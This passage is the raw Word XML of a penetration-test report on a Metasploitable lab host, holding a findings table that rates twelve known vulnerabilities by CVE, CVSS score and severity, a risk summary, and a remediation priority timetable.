    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">7.2  Consolidated Findings Table</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 17: Consolidated Security Findings with Risk Ratings</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9026"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:left w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:bottom w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:right w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:insideH w:val="single" w:color="CCCCCC" w:sz="2"/>
          <w:insideV w:val="single" w:color="CCCCCC" w:sz="2"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="400"/>
            <w:shd w:fill="1F3864"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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2600"/>
            <w:shd w:fill="1F3864"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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>
            <w:shd w:fill="1F3864"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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Port / Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1500"/>
            <w:shd w:fill="1F3864"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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CVE / Reference</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="600"/>
            <w:shd w:fill="1F3864"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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CVSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>
            <w:shd w:fill="1F3864"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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1526"/>
            <w:shd w:fill="1F3864"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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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F-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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Metasploitable Root Bind Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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1524/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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By Design</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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10.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>
            <w:shd w:fill="C00000"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FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>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Confirmed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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F-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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vsftpd 2.3.4 Backdoor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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21/tcp – FTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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CVE-2011-2523</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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9.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>
            <w:shd w:fill="C00000"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FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>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Confirmed (CVE)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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F-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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Samba usermap_script RCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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445/tcp – SMB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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CVE-2007-2447</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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9.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>
            <w:shd w:fill="C00000"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FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>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Exploited ✔</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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F-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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PostgreSQL Default Credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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5432/tcp – DB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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Config weakness</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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9.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>
            <w:shd w:fill="C00000"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FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>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Exploited ✔</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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F-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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UnrealIRCd 3.2.8.1 Backdoor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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6667/tcp – IRC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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CVE-2010-2075</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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7.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>
            <w:shd w:fill="C55A11"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FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>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Confirmed (CVE)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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F-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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Telnet Clear-text Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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23/tcp – Telnet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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CWE-312</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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7.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>
            <w:shd w:fill="C55A11"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FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>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Observed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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F-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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rlogin/rsh/rexec Exposure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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512–514/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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CWE-311</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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7.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>
            <w:shd w:fill="C55A11"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FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>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Observed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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F-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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NFS Export Exposed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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2049/tcp – NFS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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CWE-552</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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7.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>
            <w:shd w:fill="C55A11"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FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>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Observed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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F-09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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MySQL Externally Accessible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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3306/tcp – MySQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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CWE-306</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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6.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>
            <w:shd w:fill="C55A11"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FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>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Observed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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F-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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ProFTPD 1.3.1 Exposed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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2121/tcp – FTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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CVE-2010-4221</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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6.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>
            <w:shd w:fill="C55A11"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FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>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Observed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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F-11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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VNC Remote Desktop Exposed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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5900/tcp – VNC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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CWE-306</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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6.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>
            <w:shd w:fill="7F6000"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FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>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Observed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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F-12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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HTTP/Tomcat/AJP Services</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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80/8009/8180</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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Multiple</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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5.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>
            <w:shd w:fill="7F6000" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="80"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>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Partial</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">7.3  Risk Distribution Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Of the 12 unique vulnerabilities identified across the target system:</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4 are rated Critical — representing immediate, unmitigated paths to full system compromise</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5 are rated High — representing serious vulnerabilities that materially increase attack surface</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3 are rated Medium — representing risks that require planned attention</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0 are rated Low or Informational — the absence of low-severity findings reflects the consistently poor security configuration of the target</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The concentration of Critical and High findings (75% of all findings) indicates an overall security posture of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CRITICAL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for this host. No single finding should be treated in isolation; the combination of these vulnerabilities creates multiple independent paths to full system compromise.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="420" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">8.  Remediation Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation recommendations are prioritised into four tiers based on risk severity, exploitability, and potential business impact. Each recommendation includes a rationale and specific action to be taken.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">8.1  Priority Framework</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 18: Remediation Priority Framework</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9026"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:left w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:bottom w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:right w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:insideH w:val="single" w:color="CCCCCC" w:sz="2"/>
          <w:insideV w:val="single" w:color="CCCCCC" w:sz="2"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:shd w:fill="1F3864"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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Priority</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:shd w:fill="1F3864"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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Timeframe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5227"/>
            <w:shd w:fill="1F3864"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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:shd w:fill="C00000"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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Immediate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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Within 24–48 hours</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>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Critical vulnerabilities with direct path to full system compromise</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:shd w:fill="C55A11"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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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Within 7 days</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>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High-severity findings materially increasing attack surface</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:shd w:fill="7F6000"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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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Within 30 days</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>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Medium-severity findings requiring planned remediation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:shd w:fill="375623"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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Long-Term</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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Ongoing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>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Process, governance, and architectural improvements</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
